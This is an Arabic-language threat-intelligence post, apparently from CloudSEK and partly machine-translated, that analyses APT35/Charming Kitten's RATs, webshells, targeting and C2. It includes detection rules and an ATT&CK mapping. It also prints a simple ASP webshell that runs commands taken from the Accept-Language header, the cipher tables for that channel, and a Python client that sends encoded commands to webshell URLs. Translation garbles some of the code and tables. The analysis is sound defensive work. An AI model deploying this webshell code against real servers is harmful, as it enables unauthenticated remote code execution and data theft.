🚀 أصبحت CloudSek أول شركة للأمن السيبراني من أصل هندي تتلقى استثمارات منها ولاية أمريكية صندوق
🚀 أصبحت CloudSek أول شركة هندية للأمن السيبراني تدخل في شراكة مع المكتب الخاص
🚀 لقد رفعت CloudSek جولة B1 من السلسلة B1 بقيمة 19 مليون دولار - تعزيز مستقبل الأمن السيبراني التنبؤي
إلى الخلف
استخبارات الخصم

نظرة من الداخل على عمليات APT35 المرتبطة بالحرس الثوري الإيراني: Ep3 - ترسانة البرامج الضارة والأدوات

يدير APT35 (Charming Kitten) نظامًا بيئيًا احترافيًا للبرامج الضارة يتميز بنظام Saqeb و RAT-2AC2 RATs وأغلفة الويب المخصصة والوحدات التي تم اختبارها بواسطة FUD. تستخدم C2 للمجموعة TOR والمرحلات متعددة الخطوات وحركة المرور المشفرة للاستمرار والتسلل. فهي تستهدف شركات الطيران وإنفاذ القانون والبنية التحتية الإقليمية (2022-2025)، وتربط العمليات السيبرانية بالأهداف الجيوسياسية للحرس الثوري الإيراني
October 14, 2025
7
دقيقة
جدول المحتوى
مثال H2
مثال H2

ملخص تنفيذي

تكشف وثائق الحلقة 3 عن خط تطوير البرامج الضارة الكامل لـ APT35/Charming Kitten، بما في ذلك عائلتين متميزتين من RAT (نظام Saqeb و RAT-2AC2)، وأغلفة الويب المخصصة، والمواد التدريبية، وإجراءات الاختبار التشغيلي. تمثل هذه المجموعة عملية تطوير احترافية للبرامج الضارة مع ضمان الجودة المخصص وأبحاث مكافحة الاكتشاف والبنية المعيارية المصممة للاستمرار على المدى الطويل في بيئات Windows.

تعرض هذه المستندات دورة حياة تطوير البرامج الضارة بالكامل، بدءًا من مواد التدريب الهندسية العكسية وحتى نشر الإنتاج، بما في ذلك إجراءات اختبار FUD ومواصفات الوحدة والبنية التحتية التشغيلية لـ webshell.

التحليل

ملخص النتائج الرئيسية

1. ترسانة البرامج الضارة:

  • نظام ساقب: نظام التشغيل Windows RAT الاحترافي مع 5 وحدات، ونظام C2 الذي يركز على FUD ومتعدد القفزات عبر TOR
  • الفئران -2 AC2: RAT المستند إلى .NET مع الواجهة الخلفية لـ Flask وإمكانية VNC والتنكّر في صورة خدمات مشروعة
  • أغلفة الويب: متغيرات m0s.asp المخصصة باستخدام القناة السرية لرأس لغة القبول والتشفير البديل
  • أدوات الدعم: برنامج التشفير V1 ومجموعات التصيد الاحتيالي (خدع Google Drive) والمواد التدريبية

2. النطاق التشغيلي:

  • أكثر من 300 كيان مخترق (ذكرت ذلك APT35)
  • أكثر من 6 دول مستهدفة (الإمارات العربية المتحدة، الأردن، تركيا، إسرائيل، مصر، المملكة العربية السعودية)
  • خروقات متعددة مؤكدة: فلاي دبي، شرطة دبي، السياحة الصحراوية الأردنية، إيبوستا، بالإضافة إلى جميع ضحايا الحلقة 1-2
  • عمليات طويلة الأجل: 2022-2025 نشاط موثق

3. مستوى الرقي:

  • تطوير متقدم: الكود الأصلي (C/C ++)، البنية المعيارية، ضمان الجودة/الاختبار الاحترافي
  • تركيز مضاد للكشف: مختبر FUD، التهرب المنهجي من AV، مكافحة التصحيح/مكافحة VM، تشويش السلسلة
  • الأمن التشغيلي: C2 متعدد الخطوات، تكامل TOR، خوادم الترحيل، تشفير حركة المرور
  • وثائق الجودة: أدلة كاملة، ومناهج تدريبية، وتقارير تشغيلية

4. الأهداف الإستراتيجية:

  • الاستخبارات الإقليمية: قواعد بيانات المطارات/الفنادق وإنفاذ القانون وأنظمة SCADA
  • عمليات ضد إسرائيل: مجموعة برامج الفدية الخاصة بـ Moses Staff، أكثر من 300 موقع مُعد للهجمات
  • حملات التأثير: أعلام سوداء، صهيون 24، «إسرائيل، المرآة الهشة»
  • دعم محور المقاومة: تبادل كاميرات المراقبة، تنسيق الاستخبارات، التحالف الإقليمي

تحليل عائلة البرامج الضارة

نظام A. Saqeb - نظام النوافذ الرئيسية RAT

نظرة عامة

  • الاسم: نظام ساقب (ساقية ثايب)
  • المنظمة: معهد أفغ للإعلام (موسي راحته أفاق)
  • التصنيف: نظام التشغيل Windows RAT المتقدم مع بنية معيارية
  • المنصة المستهدفة: Windows (جميع الإصدارات)
  • لغة التطوير: C ++ (الكود الأصلي - لا يعتمد على .NET)
  • الهندسة المعمارية: نظام مكون من جزأين (وكيل + لوحة قيادة)

مواصفات الوكيل:

  • لغة البرمجة: C ++ (اللغة الأصلية)
  • تجميع: فيسوال ستوديو 2015
  • وقت التشغيل: متعدد الخيوط (علامة /MT)
  • التبعيات: مستقلة عن الإطار (الكود الأصلي)
  • مكافحة الكشف: تصميم يركز على FUD
  • الاتصال: HTTP/HTTPS مع تشفير XOR

هيكل تركيبي (5 مكونات):

لوحة القيادة والتحكم

مكدس تكنولوجيا الألواح:

  • النظام الأساسي: قائم على الويب (خدمة TOR المخفية)
  • الواجهة الخلفية: غير محددة (من المحتمل أن تكون PHP/Python)
  • الوصول: اسم المستخدم/كلمة المرور+ CAPTCHA
  • الاتصال: HTTP عبر TOR
  • الفاصل الزمني الافتراضي: 20 ثانية (قابل للتكوين)

إمكانيات اللوحة:

Feature Description Technical Implementation
Client Management View online/offline clients Real-time status polling
File Explorer Browse/download/upload files Access-level dependent
Command Execution Windows CMD commands Real-time result return
Screenshot Capture Desktop image retrieval GDI-based capture
Keylogger Control Start/stop key logging Disk-based encrypted storage
Stealer Modules Firefox/Telegram extraction On-demand module delivery
Auto-Run Scheduling Daily/weekly persistence Configurable execution times
Remote Update Agent version updates central.dat replacement
Self-Destruct Complete removal "Kill RAT" function

ميزات واجهة المستخدم الخاصة باللوحة (من الدليل):

- إضافة عميل جديد: يقوم بإنشاء وكيل ZIP فريد محمي بكلمة مرور

- الرقم التسلسلي: معرف فريد لكل وكيل (على سبيل المثال، 337E81E3BA4B)

- الحالة: حالات متصلة/غير متصلة/متوقفة

- شريط تمرير الفاصل الزمني: ضبط تردد رد الاتصال (بالثواني)

- سجلات التاريخ: تتبع تنفيذ الأوامر باستخدام الطوابع الزمنية

- إدارة المستخدم: التحكم في الوصول متعدد المستخدمين

- شاشة القفل: ميزة أمان اللوحة

- تصدير CSV: استخراج نتائج الأوامر

تدفق التنفيذ:

1. تنزيل lock.dat من الخادم (مشفر سداسي)

2. فك التشفير إلى rns.dll

3. قم بإنشاء ملف BAT باستخدام الأمر rundll32

4. تنفيذ BAT → rundll32 يقوم بتحميل rns.dll

5. استدعاء وظيفة snrProc ()

6. تدمير عشوائي للبايت على الملفات التي يمكن الوصول إليها

سير عمل اختطاف الجلسة:

1. قرص البحث لمجلد تيليجرام

2. حدد موقع ملفات الجلسة

3. يقوم Base64 بترميز جميع الملفات

4. الإرسال إلى C2

5. يستبدل المهاجم الملفات على النظام الجديد

6. احصل على الوصول إلى Telegram (في حالة عدم وجود كلمة مرور سحابية)

باء - RAT-2AC2 - منصة RAT الثانوية

نظرة عامة

  • تطوير: لغة C# + إطار .NET 4
  • الخادم: بايثون + فلاسك الإصدار 2
  • بروتوكول: HTTPS://HTTPS
  • الهندسة المعمارية: خادم العميل مع التسجيل المستند إلى API
  • البنية التحتية: يدعم إعادة توجيه DNS والمرحلات المتعددة

المواصفات الفنية

العميل (الوكيل):

  • اللغة: C#
  • الإطار: .NET 4.0 (كود مُدار)
  • النظام الأساسي: ويندوز
  • الاتصال: واجهة برمجة تطبيقات HTTP REST
  • المصادقة: الرمز المميز المستند إلى الرأس
  • تقارير الحالة: كل 5 ثوان
  • الأمر الأولي: تنفيذ معلومات النظام

الخادم (اللوحة):

  • اللغة: بايثون 3.x
  • الإطار: قارورة 2.x
  • توصية نظام التشغيل: لينكس ديبيان
  • التثبيت: تثبيت pip3 -r requirement.txt
  • التنفيذ: بيثون3 app.py
  • التكوين: السطر الأخير من app.py (العنوان/المنفذ)

نقاط نهاية API

Endpoint Method Function Parameters
/api POST Initial client registration IP, OS, CPU, RAM, AV, .NET, DOMAIN, POWERSHELL, USERNAME, PYTHON_VERSION, COUNTRY
/cmd/<id> GET Retrieve commands for client Client ID
/panel GET Web panel access Requires header token + login
/login POST Authentication Username, Password
/keylogger POST Keylogger results Client ID, logged data
/vncLauncher POST Initialize VNC Triggers bore/noVNC setup
/vncConnect GET Connect to VNC Opens browser connection
/vncTerminate POST Stop VNC Kills novncproxy/bore
/file POST File upload to server File data
/command POST Register command Client ID, command string
/result POST Command result Client ID, result data
/log GET Command history All logged commands
/download GET Download file from client Path parameter
/delete POST Delete client Client ID
/SysInfo POST System information Full systeminfo output
/uploadInDatabase POST Upload file to client File + path

تنفيذ الأمان

تدفق المصادقة:

1. يرسل العميل طلب API مع رمز العنوان

2. يقوم الخادم بالتحقق من صحة الرمز

3. إذا كان صالحًا، يقوم بتعيين معرف فريد

4. يستخدم العميل المعرف لجميع الطلبات اللاحقة

5. تم استرداد الأوامر عبر /cmd/ <id>

الإمكانيات

الوصول عن بُعد:

  • VNC: يعتمد على المتصفح عبر نفق NovNC+ bore.pub
  • تنفيذ الأوامر: غلاف ويندوز CMD
  • تسجيل المفاتيح: التقاط لوحة مفاتيح الخلفية مع تخزين الملفات
  • لقطة شاشة: التقاط صورة سطح المكتب
  • إدارة الملفات: تحميل/تنزيل مع مواصفات المسار

هندسة VNC:

1. يقوم العميل بتنزيل برنامج ممل

2. يقوم بإعداد خادم NovNC

3. ينفذ المنفذ للأمام عبر التجويف

4. يرسل عنوان bore.pub + المنفذ إلى الخادم

5. يتصل المشغل عبر المتصفح

6. الإنهاء عبر VNCterminet (يقتل جميع الخدمات)

عمليات الملفات:

تنزيل من العميل:

1. الأمر: تحميل=/path/to/ملف

2. يقرأ العميل الملف ← تشفير Base64 ← الإرسال إلى الخادم

3. يخزن الخادم الملف ← يعرض في اللوحة

4. يعتمد مستوى الوصول على امتيازات العميل

تحميل إلى العميل:

1. تحميل الملف إلى الخادم عبر /file

2. أمر التسجيل: تحميل =/path/to/file/filename.ext

3. تنزيلات العميل من الخادم

4. يكتب العميل الملف إلى المسار المحدد

سير عمل كيلوجر:

1. يرسل الخادم أمر «keylogger»

2. يتحول زر اللوحة إلى اللون الأحمر (الانتظار)

3. يبدأ العميل في تسجيل الدخول إلى ملف القرص

4. يتم إرسال النتائج بشكل دوري إلى الخادم

5. يتحول زر اللوحة إلى اللون الأزرق (تم استلام البيانات)

6. انقر فوق الزر لعرض النتائج

البنية التحتية لـ Webshell

A. m0s.asp - غلاف ويب ASP المتقدم

نظرة عامة

  • اللغة: ASP كلاسيكي (VBScript)
  • الطريقة: قناة أوامر تستند إلى رأس HTTP
  • الترميز: تشفير بديل مخصص
  • التنفيذ: تنفيذ الأمر wscript.shell

التنفيذ الفني

قناة الأوامر:

أسب

عنوان 'اقرأ لغة القبول'

تم ترميز CMD = متغيرات request.server («HTTP_ACCEPT_LANGUAGE»)

'فك التشفير عبر التشفير المخصص

تم فك تشفير CMD = وظيفة فك التشفير (تم ترميز CMD)

'تنفيذ الأمر

تعيين objShell = server.createObject («wscript.shell»)

تعيين ObjExec = objShell.exec (تم فك ترميز «cmd /c» و cmddexec)

'العودة - ستوداوت

الإجابة. اكتب Objexec.stdout.اقرأ الكل ()

تشفير الاستبدال:

جدول الترميز (EN):

AB_CDEFG.HIKLM! $%&* ()؟ لا يوجد جهاز كشف حساب من نوع KL Mnopqrstu=VWXYZ0123456789/

جدول فك التشفير (DE):

Qk3\ وحدة المعالجة المركزية (وحدة المعالجة المركزية) بواسطة Jtgywsv=0EGDX62x-NRVZ! ~$%_* ()؟ UQ7os1IJF مولوي تي سي إل 98K5nbrn4.pr

منطق وظيفة فك التشفير:

  • لكل حرف في سلسلة مشفرة:
    • ابحث عن موضع في جدول DE
    • استبدل بحرف في نفس الموضع في جدول EN
    • إلحاق بسلسلة تم فك تشفيرها
  • إرجاع الأمر الذي تم فك تشفيره

الاستخدام التشغيلي

البرامج النصية للعميل (بايثون):

الثعبان

# connect.py، RCE4.py، نمط rce5.py

طلبات الاستيراد

# عناوين URL المستهدفة المشفرة (أمثلة من القطع الأثرية)

الأهداف = [

«https://<domain>/الصورة/الفلاش/test9/m0s.phto «،

«http://<IP>/images/m0s.php"،

«http://<domain>/CMS/Uploads/m0s.aspx»

]

# وظيفة الترميز (تعكس وحدة فك ترميز ASP)

def encode_command (cmd):

en = «AB_CDEFG.HIJKLM! $%&* ()؟ لا يوجد دعم فني لـ KL Mnopqrstu=VWXYZ0123456789/»

de = «Qk3\\ fcpbyjtgywsv=0egdx62x-NRVZ! ~$%_* ()؟ UQ7os1IJFMULOETCL98K5nbrn4.pr.

ترانس = str.maketrans (الإنجليزية، الإنجليزية)

إرجاع cmd.translate (ترانس)

# حلقة تفاعلية

بينما صحيح:

cmd = الإدخال («CMD> «)

مشفرة = encode_command (cmd)

    

الرؤوس = {

«لغة القبول»: مشفرة،

«قبول كلمة التحقق»: «[القيمة المحددة مسبقًا]»،

«وكيل المستخدم»: «Mozilla/5.0...»

}

    

الاستجابة = requests.get (target_url، العناوين = الرؤوس)

طباعة (نص الاستجابة)

ب. file.asp/webshell.asp - المتغيرات الأبسط

التنفيذ

أسب

<%

'تنفيذ الأوامر المباشرة (بدون ترميز)

cmd = متغيرات request.server («HTTP_ACCEPT_LANGUAGE»)

تعيين objShell = server.createObject («wscript.shell»)

تعيين ObjExec = objShell.exec («cmd /c» و cmd)

الإجابة. اكتب Objexec.stdout.اقرأ الكل ()

%>

الهدف: RCE الكامل مع امتيازات عملية عامل IIS، بدون مصادقة، تنفيذ مباشر من الرأس إلى الغلاف.

3. الذكاء المستهدف

ألف - تحليل أنماط الاستهداف

التركيز الجغرافي:

  • الأساسي: الإمارات العربية المتحدة (تم تأكيد 2: فلاي دبي، شرطة دبي)
  • ثانوي: الأردن (1 مؤكد: قطاع السياحة)
  • التعليم العالي: تركيا (تم تأكيد 1: مزود البريد الإلكتروني)
  • نشط: إسرائيل (تؤكد بنية المجلد)

نشط: مصر (تؤكد بنية المجلد)

استهداف القطاع:

  • الطيران: فلاي دبي
  • تطبيق القانون: شرطة دبي
  • السياحة: صحراء الأردن
  • الاتصالات: البريد الإلكتروني

النمط الاستراتيجي:

  • البنية التحتية الحيوية: قطاع الطيران
  • منجم الذكاء: أنظمة إنفاذ القانون
  • الذكاء الاقتصادي: السياحة (تتبع الزوار)
  • مراقبة الاتصالات: موفرو البريد الإلكتروني

باء - SCADA/الاستهداف الصناعي (من تقرير #78TPDD)

القدرات المعلنة:

  • «إنشاء الوصول إلى البنى التحتية الصناعية واستخراج معلومات نطاق SCADA لاستخدامها في العمليات السيبرانية الهجومية»

الآثار:

  • استطلاع SCADA النشط مستمر
  • جمع المعلومات للهجمات المستقبلية
  • تطوير القدرات الهجومية
  • استهداف البنية التحتية الحيوية

الأهداف المحتملة (على أساس التركيز الإقليمي):

  • منشآت النفط والغاز (الإمارات العربية المتحدة والمملكة العربية السعودية)
  • محطات معالجة المياه (المذكورة: وصول شركة المياه الوطنية في الحلقة 2)
  • توليد/توزيع الطاقة
  • محطات تحلية المياه (البنية التحتية الحيوية في دولة الإمارات العربية المتحدة)
  • أنظمة المطارات (نقطة وصول فلاي دبي)

جيم- مقياس برامج الفدية (من تقرير #78TPDD)

الإنجاز المعلن:

  • «إنشاء الوصول إلى أكثر من 300 موقع وشركة لـ

هجمات رانسوم وير تتماشى مع استغلال وسائل الإعلام»

التحليل:

  • أكثر من 300 كيان مخترق: مخزون وصول ضخم
  • برامج الفدية جاهزة:: جاهزة للنشر
  • تسليح وسائل الإعلام: الهجمات موقوتة للتأثير النفسي
  • مجموعة موظفي موسى:: الإسناد العام للعمليات

عمليات طاقم موسى:

  • التكتيكات: رانسوموا+تسريبات البيانات
  • الهدف: «النظام الصهيوني» (إسرائيل)
  • استراتيجية وسائل الإعلام: تغطية شبكة الأخبار العالمية
  • الغرض: «كسر الهيمنة الجوفاء في القدرة السيبرانية»

4. إرشادات الكشف والوقاية

الكشف السلوكي

نمط ساقب السلوكي:

المشغلات:

1. تقوم العملية بإنشاء موتكس عبر createEventa ()

2. ويقوم AND بتحميل المكتبة من ملف.dat (LoadLibrary على ملحق غير PE)

3. ويقوم AND بإجراء اتصالات HTTPS مع الحمولات المشفرة بـ XOR

4. ويعرض AND واحدًا من:

- ربط لوحة المفاتيح (تعيين WindowsHookex WH_KEYBOARD_LL)

- تعداد الملفات على مستوى جذر القرص

- عمليات إرسال شبكة صغيرة متعددة مع تأخيرات

- الوصول إلى دليل ملف تعريف فايرفوكس (logins.json)

- الوصول إلى مجلد تيليجرام (D877f783d5d3D3ef8cs)

الخطورة: حرجة

الاستجابة: عزل وتجميع الذاكرة وتفريغها وتنبيه SOC

النمط السلوكي RAT-2AC2:

القاعدة: سلوك APT35_RAT2AC2

المشغلات:

1. يتم تشغيل .NET القابل للتنفيذ باسم يشبه الخدمة من موقع غير قياسي

2. AND يجعل HTTP POST إلى نقطة نهاية /api مع بيانات تعداد النظام

3. AND <id>يستطلع/cmd/نقطة النهاية كل 5-10 ثوان

4. ويعرض AND واحدًا من:

- تنزيل برنامج bore.pub

- تبدأ خدمة نوفمبر

- ينفذ أمر معلومات النظام

- يقوم بإنشاء ملفات بصيغة Base64

- نشاط إعادة توجيه المنافذ

الخطورة: حرجة

الاستجابة: عملية القتل، حظر عناوين C2 IP، التحقيق الجنائي

نمط Webshell السلوكي:

القاعدة: سلوك APT35_webshell

المشغلات:

1. عملية عامل IIS (w3wp.exe)

2. وينتج ملف cmd.exe أو powershell.exe

3. يتضمن الأمر AND كلمات رئيسية مشبوهة:

- whoami، مستخدم الشبكة، المجموعة المحلية الصافية

- ipconfig، netstat، قائمة المهام

- المجلد C:\، اكتب [ملف]

- WMIC، الاستخدام الصافي (الحركة الجانبية)

4. وتضمن طلب HTTP عنوان لغة القبول غير المعتاد

الخطورة: عالية

الاستجابة: حظر عنوان IP المصدر، وقتل عملية الويب، والتحقق من أغلفة الويب الدائمة

5. رسم خرائط ميتري ATT&CK

Adversary techniques & evidence mapping
Tactic Technique Sub-Technique Evidence Malware
Initial Access T1566 - Phishing T1566.001 - Spearphishing Attachment Google Drive phishing kit with .rar files All campaigns
Initial Access T1190 - Exploit Public-Facing Application Webshell deployment on web servers m0s.asp variants
Execution T1059 - Command and Scripting Interpreter T1059.001 - PowerShell Webshell cmd execution m0s.asp, RAT-2AC2
Execution T1059.003 - Windows Command Shell cmd /c execution via WScript.Shell m0s.asp, file.asp
Execution T1204 - User Execution T1204.002 - Malicious File Phishing attachments, malware executables Saqeb, RAT-2AC2
Execution T1106 - Native API CreateEventA, LoadLibrary, GetProcAddress Saqeb main
Persistence T1543 - Create or Modify System Process T1543.003 - Windows Service Service masquerading (WinUpdateService.exe, etc.) RAT-2AC2
Persistence T1547 - Boot or Logon Autostart Execution T1547.001 - Registry Run Keys Auto-run scheduling (daily/weekly) Saqeb
Persistence T1505 - Server Software Component T1505.003 - Web Shell m0s.asp, file.asp, webshell.asp deployed Webshells
Privilege Escalation T1543 - Create or Modify System Process T1543.003 - Windows Service Elevated service creation RAT-2AC2
Defense Evasion T1027 - Obfuscated Files or Information T1027.002 - Software Packing Hex encoding of modules (bin2hex.py) Saqeb modules
Defense Evasion T1027.007 - Dynamic API Resolution LoadLibrary + GetProcAddress at runtime Saqeb main
Defense Evasion T1140 - Deobfuscate/Decode Files or Information Runtime hex decoding, XOR decryption, string deobfuscation Saqeb, webshells
Defense Evasion T1036 - Masquerading T1036.004 - Masquerade Task or Service Legitimate service names (Microsoft, Exchange, Windows) RAT-2AC2
Defense Evasion T1036.008 - Masquerade File Type .dat extensions for DLLs Saqeb modules
Defense Evasion T1070 - Indicator Removal T1070.004 - File Deletion Self-destruct capability ("Kill RAT") Saqeb
Defense Evasion T1112 - Modify Registry Registry manipulation for persistence (minimal to avoid detection) Saqeb
Defense Evasion T1497 - Virtualization/Sandbox Evasion Anti-VM techniques (training curriculum Section 8) All malware
Defense Evasion T1622 - Debugger Evasion Anti-debug mechanisms Saqeb (documented in manual)
Defense Evasion T1562 - Impair Defenses T1562.001 - Disable or Modify Tools AV exclusion paths in file destruction module rns.dll
Credential Access T1555 - Credentials from Password Stores T1555.003 - Credentials from Web Browsers Firefox password extraction (nss3.dll abuse) stler.dll (creds.dat)
Credential Access T1552 - Unsecured Credentials T1552.001 - Credentials In Files Telegram session file theft telg.dll (msg.dat)
Credential Access T1056 - Input Capture T1056.001 - Keylogging SetWindowsHookEx keyboard hooking klg.dll (logging.dat)
Discovery T1082 - System Information Discovery systeminfo command execution RAT-2AC2, webshells
Discovery T1083 - File and Directory Discovery Disk-level file enumeration (Fexp function) Saqeb main
Discovery T1057 - Process Discovery Process enumeration capabilities All RATs
Discovery T1033 - System Owner/User Discovery whoami, username collection All malware
Discovery T1016 - System Network Configuration Discovery ipconfig, network enumeration Webshells, RATs
Discovery T1049 - System Network Connections Discovery netstat commands Webshells
Discovery T1518 - Software Discovery T1518.001 - Security Software Discovery AV detection (Kaspersky, BitDefender exclusions) Saqeb, RAT-2AC2
Lateral Movement T1021 - Remote Services T1021.006 - Windows Remote Management WMIC commands in webshell scripts RCE4.py comments
Lateral Movement T1080 - Taint Shared Content File upload to UNC shares Webshell comments (vmware-tools.exe example), connect.py
Collection T1005 - Data from Local System File download capabilities, Firefox/Telegram data extraction Saqeb, RAT-2AC2
Collection T1113 - Screen Capture Screenshot functionality (capHandler) Saqeb, RAT-2AC2
Collection T1119 - Automated Collection Automated file enumeration and exfiltration Saqeb
Collection T1056 - Input Capture T1056.001 - Keylogging Keyboard hook with window title logging klg.dll
Command & Control T1071 - Application Layer Protocol T1071.001 - Web Protocols HTTP/HTTPS C2 communication All malware
Command & Control T1132 - Data Encoding T1132.001 - Standard Encoding XOR encryption, Base64, hex encoding, substitution cipher All malware
Command & Control T1573 - Encrypted Channel T1573.001 - Symmetric Cryptography XOR-based traffic encryption Saqeb
Command & Control T1090 - Proxy T1090.003 - Multi-hop Proxy Relay servers + TOR (7 hops) Saqeb
Command & Control T1095 - Non-Application Layer Protocol TOR network usage (.onion addresses) Saqeb
Command & Control T1571 - Non-Standard Port Webshells on ports 9003, various custom ports Episodes 1-2 evidence
Command & Control T1001 - Data Obfuscation T1001.002 - Steganography Covert channel via Accept-Language header m0s.asp variants
Command & Control T1105 - Ingress Tool Transfer Module download from C2 (dwPlugin function) Saqeb
Exfiltration T1041 - Exfiltration Over C2 Channel Data exfiltration via HTTP POST All malware
Exfiltration T1020 - Automated Exfiltration Scheduled data collection and transmission Saqeb
Exfiltration T1030 - Data Transfer Size Limits Chunked file transfer (flwHandler) Saqeb
Impact T1486 - Data Encrypted for Impact Ransomware encryption routine observed in payloads Saqeb-ransom variant

المراجع

https://github.com/KittenBusters/CharmingKitten

كوشيك بالم
Threat Researcher at CloudSEK, specializing in digital forensics, incident response, and adversary hunting to uncover attacker motives, methods, and operations.
باجيلا مانوهار ريدي
Threat Researcher at CloudSEK

مدونات ذات صلة

هذا نص داخل كتلة div.
استخبارات الخصم
February 2, 2026
11
دقيقة
احتيال الاستثمار في العملات المشفرة عبر الحدود بالاستفادة من قنوات المراسلة الاجتماعية وبيانات الاعتماد التنظيمية المزيفة
اقرأ المزيد
هذا نص داخل كتلة div.
استخبارات الخصم
January 27, 2026
7
دقيقة
التمحور من PayTool: تتبع عمليات الاحتيال المختلفة والجرائم الإلكترونية التي تستهدف كندا
اقرأ المزيد
هذا نص داخل كتلة div.
استخبارات الخصم
January 21, 2026
8
دقيقة
داخل برنامج MacSync القائم على البرامج النصية ونظام التشغيل الثلاثي لتطبيق محفظة الأجهزة
اقرأ المزيد